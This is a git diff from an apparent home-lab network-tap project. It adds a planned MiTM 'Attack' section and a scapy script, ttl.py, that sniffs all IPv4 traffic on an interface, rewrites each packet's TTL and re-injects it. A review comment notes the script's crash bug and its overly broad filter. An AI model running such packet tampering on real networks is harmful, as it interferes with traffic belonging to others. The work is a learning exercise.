diff --git a/final/final.md b/final/final.md
index 9bdec6f..044ee41 100644
--- a/final/final.md
+++ b/final/final.md
@@ -155,7 +155,7 @@ Like before, discarded/dropped frames number only 1 or 2 over a period of severa
 Now it is time to do something interesting with pitap by capturing and forwarding the traffic.
-The script [`capture.py`](./capture.py) is intended to do just this. Using scapy, the script works by sniffing all traffic on an interface provided from arguments, and saving those to a unique timestamped file. Every time a file is saved, it attempts to transmit them to a supplied ip address and port (defaults to my workstation on LAN) with the intention that a listening netcat server can capture and save the contents.
+The script [`capture.py`](./scripts/capture.py) is intended to do just this. Using scapy, the script works by sniffing all traffic on an interface provided from arguments, and saving those to a unique timestamped file. Every time a file is saved, it attempts to transmit them to a supplied ip address and port (defaults to my workstation on LAN) with the intention that a listening netcat server can capture and save the contents.
 The professional thing to do here would be to connect the raspberry pi via wifi to an entirely seperate network, or even to set it up as an access point so that way it can communicate with a netcat server running off the network I am snooping on. However, since we are no longer evaluating the transparency of the pitap I will keep things simple for the sake of time by just connecting pitap via wifi to my router again. I will also be running the netcat server on my workstation, which is the same one consuming the RTSP stream from reolink while I capture. This should all be fine, since transmission to the netcat server will be exclusively over wifi and not on ethernet.
@@ -191,4 +191,12 @@ Here is a look at `received_file-1.pcap` in wireshark. For this capture, I start
-### 6. Attack
\ No newline at end of file
+### 6. Attack
+
+To wrap up, I will create three MiTM style attacks that can be executed by the pitap
+
+#### 6a. TTL=65
+
+#### 6b.
+
+#### 6c.
\ No newline at end of file
diff --git a/final/capture.py b/final/scripts/capture.py
similarity index 100%
rename from final/capture.py
rename to final/scripts/capture.py
diff --git a/final/scripts/ttl.py b/final/scripts/ttl.py
new file mode 100644
index 0000000..d946c3a
--- /dev/null
+++ b/final/scripts/ttl.py
@@ -0,0 +1,29 @@
+import sys
+from scapy.all import sniff, send, IP
+from datetime import datetime
+
+modifications = 0
+
+def modify_packet(packet):
+ if packet.haslayer(IP):
+ if packet[IP].ttl != 65:
+ packet[IP].ttl = 65
+ modifications += 1
+ send(packet)
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print(f"Usage: {sys.argv[0]} ")
+ sys.exit(1)
+
+ interface = sys.argv[1]
+
+ start_time = datetime.now()
+ print(f"Script started at: {start_time.strftime('%Y-%m-%d %H:%M:%S')}")
+
+ packets = sniff(filter="ip", iface=interface, timeout=30*1, prn=modify_packet)
+
+ end_time = datetime.now()
+ print(f"Script ended at: {end_time.strftime('%Y-%m-%d %H:%M:%S')}")
+ print(f"{modifications} packets modified")
\ No newline at end of file
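Review bot: In the new `final/scripts/ttl.py`, `modifications += 1` inside `modify_packet` assigns to a name Python treats as local, so the first packet whose TTL is not 65 raises `UnboundLocalError` instead of being counted; add `global modifications` as the first statement of the function. The callback also acts on every IPv4 packet seen on the interface because the capture filter is just `filter="ip"`; for a lab exercise it would be safer to narrow it to the device under test (for example `filter="ip and host <LAB_DEVICE_IP>"`) so unrelated traffic on the segment is left alone. Indentation is not recoverable from this page, so it is unclear whether `send(packet)` sits inside the TTL check; if it is outside, packets the script itself emits may be captured and re-sent again. The usage message names no argument, since a placeholder such as `<interface>` appears to be missing after `{sys.argv[0]}`.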